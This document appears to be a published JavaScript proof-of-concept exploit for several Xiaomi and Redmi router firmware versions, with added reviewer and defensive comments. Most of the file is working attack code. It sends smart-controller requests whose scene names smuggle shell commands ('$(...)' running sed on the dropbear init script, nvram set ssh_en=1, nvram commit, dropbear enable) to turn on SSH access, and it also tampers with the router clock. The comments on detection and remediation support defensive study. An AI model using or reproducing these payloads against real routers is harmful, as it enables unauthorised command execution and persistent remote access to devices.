@FloatSheep
Created August 13, 2024 15:56
/* This PoC is based on https://www.right.com.cn/forum/thread-8348455-1-1.html */
/* Applies to
Xiaomi 10-Gigabit Router: MiWiFi ROM stable 1.0.53
Xiaomi Router AC2100: MiWiFi ROM stable 2.0.743
Xiaomi Router AX1800: MiWiFi ROM stable 1.0.399
Xiaomi Router AX3000: MiWiFi ROM stable 1.0.48 / 1.0.46
Xiaomi AIoT Router AX3600: MiWiFi ROM stable 1.1.21
Xiaomi Router AX9000: MiWiFi ROM stable 1.0.165
Xiaomi AIoT Router AC2350: MiWiFi ROM stable 1.3.8
Redmi Router AX5400 Gaming Edition: MiWiFi ROM stable 1.0.95
Redmi Router AX3000: MiWiFi ROM stable 1.0.33
and lower firmware versions of the routers listed above */
/*
 * Reviewer summary (what the script below does, as visible in this file):
 *   - It runs in the browser on the router's admin page and issues same-origin
 *     requests to the router's web API.
 *   - Each "scene_setting" request carries a scene `name` of the form '$(...)',
 *     i.e. a shell command substitution. The script relying on this implies the
 *     affected firmware hands the scene name to a shell without sanitising it
 *     (command injection in the smart-controller scene handler).
 *   - The injected commands edit /etc/init.d/dropbear, set and commit the
 *     nvram flag ssh_en=1, and enable the dropbear (SSH) service.
 *
 * Defensive notes:
 *   - Exposure: the header above lists the affected firmware builds ("and lower");
 *     upgrading past them is the expected remediation. The fixed build numbers
 *     are not stated on this page, so verify against the vendor's release notes.
 *   - Detection: POSTs to the request_smartcontroller endpoint whose scene name
 *     contains "$(" or quote characters, unexpected calls to set_sys_time, a
 *     truthy `ssh` field in the fac_info response, or a dropbear listener on a
 *     router where SSH was never enabled.
 *   - Root cause to fix in firmware: treat the scene name as data (strict
 *     allow-list of characters, no shell interpolation).
 */
// Base URL = everything before "/web" in the current page address.
// NOTE(review): on MiWiFi the admin URL normally carries the session token in
// the path before "/web", so these requests would run with the logged-in
// admin's session, making this a post-authentication issue. Confirm.
const xqUrl = window.location.href.split("/web")[0];
/**
 * Sends the request sequence described in the summary above.
 * Resolves with no value; rejects with a wrapped Error if any step throws.
 */
async function vulnerabilityApplicator() {
try {
// Set the router clock to a fixed date/time (2023-2-19 23:4:47, CST-8).
// presumably so the scene timers registered below line up with the clock;
// the page does not explain the choice.
await fetch(
`${xqUrl}/api/misystem/set_sys_time?time=2023-2-19%2023:4:47&timezone=CST-8`
);
// Step 1: register a scene (timer "3:1") whose name is a command substitution
// running sed over /etc/init.d/dropbear, replacing "release" with "XXXXXX".
// presumably this defeats a release-channel check in that init script; the
// script's contents are not shown here.
const dropbearConfigApply = await fetch(
`${xqUrl}/api/xqsmarthome/request_smartcontroller`,
{
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(sed%20-i%20s%2Frelease%2FXXXXXX%2Fg%20%2Fetc%2Finit.d%2Fdropbear)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A1%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
}
);
// NOTE(review): `code` and `msg` are read from the fetch Response object
// itself; the response body is not parsed at this point. Only the
// `status === 500` comparison uses a standard Response property.
if (
dropbearConfigApply.code === 3 ||
dropbearConfigApply.code === -100 ||
dropbearConfigApply.code === 3001
) {
throw new Error(dropbearConfigApply.msg);
} else if (dropbearConfigApply.status === 500) {
// Message: "Unable to apply the dropbear configuration; try downgrading the
// router firmware".
throw new Error("无法应用 dropbear 配置,请尝试降低路由器固件版本");
}
// Ask the controller to start the scenes scheduled for "3:1".
const triggerController = await fetch(
`${xqUrl}/api/xqsmarthome/request_smartcontroller`,
{
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A1%22%2C%22week%22%3A0%7D",
}
);
// Same caveat as above: `code`/`msg` come from the Response object.
if (triggerController.code === 3004 || triggerController.code === -100) {
throw new Error(triggerController.msg);
} else if (triggerController.status === 500) {
// Message: "Unable to invoke the trigger; check the router's running state".
throw new Error("无法调用触发器,请检查路由器运行状态");
}
// Step 2: same pattern. The scene name runs `nvram set ssh_en=1` (timer "3:2").
await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(nvram%20set%20ssh_en%3D1)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A2%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
});
// Start the scenes scheduled for "3:2". The response is not inspected.
await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A2%22%2C%22week%22%3A0%7D",
});
// Step 3: the scene name runs `nvram commit` (timer "3:3"), persisting the flag.
await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(nvram%20commit)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A3%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
});
// Start the scenes scheduled for "3:3". The response is not inspected.
await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A3%22%2C%22week%22%3A0%7D",
});
// Read back the factory-info endpoint and parse it as JSON; the `ssh` field
// is used as the indicator that the nvram flag took effect. For defenders
// this same field is a quick check for whether SSH has been switched on.
const sshCallback = await fetch(`${xqUrl}/api/xqsystem/fac_info`);
const sshStatusText = await sshCallback.text();
const sshStatus = JSON.parse(sshStatusText);
if (!sshStatus.ssh) {
// Message: "Unable to enable ssh; retry or try another method".
throw new Error("无法开启 ssh,请重试或尝试其他方法");
} else {
// Message: "SSH configuration enabled successfully; starting the ssh service...".
console.log("开启 ssh 配置是成功的,正在开启 ssh 服务...");
}
// Step 4: the scene name invokes the dropbear init script's `enable` action.
await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(%2Fetc%2Finit.d%2Fdropbear%20enable)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A4%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
});
// Request a crontab-style scene start. The response is not inspected.
await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A5%22%2C%22week%22%3A0%7D",
});
// Put the router clock back using the browser's local date and time. The
// timezone parameter stays hard-coded to CST-8 regardless of the browser's
// zone. A clock that jumps to 2023-02-19 and back is a log artefact
// defenders can look for.
const nowYear = String(new Date().getFullYear());
const nowMonth = (new Date().getMonth() + 1).toLocaleString();
const nowDay = new Date().getDate().toLocaleString();
const nowHour = new Date().getHours().toLocaleString();
const nowMinute = new Date().getMinutes().toLocaleString();
const nowSecond = new Date().getSeconds().toLocaleString();
await fetch(
`${xqUrl}/api/misystem/set_sys_time?time=${nowYear}-${nowMonth}-${nowDay}%20${nowHour}:${nowMinute}:${nowSecond}&timezone=CST-8`
);
// Message: "The exploit appears to have been applied; try connecting to the router".
console.log("漏洞似乎应用成功,请尝试连接路由器");
} catch (err) {
// Wrap any failure (network error, JSON parse error, or the throws above).
// Message prefix: "A problem occurred while applying the exploit:".
throw new Error(`应用漏洞时出现问题:${err}`);
}
}
// Run immediately. The function returns nothing, so the logged value is
// undefined on success; on failure the error is re-thrown from inside the
// promise handler and surfaces as an unhandled rejection in the console.
vulnerabilityApplicator()
.then((e) => {
console.log(e);
})
.catch((e) => {
throw new Error(e);
});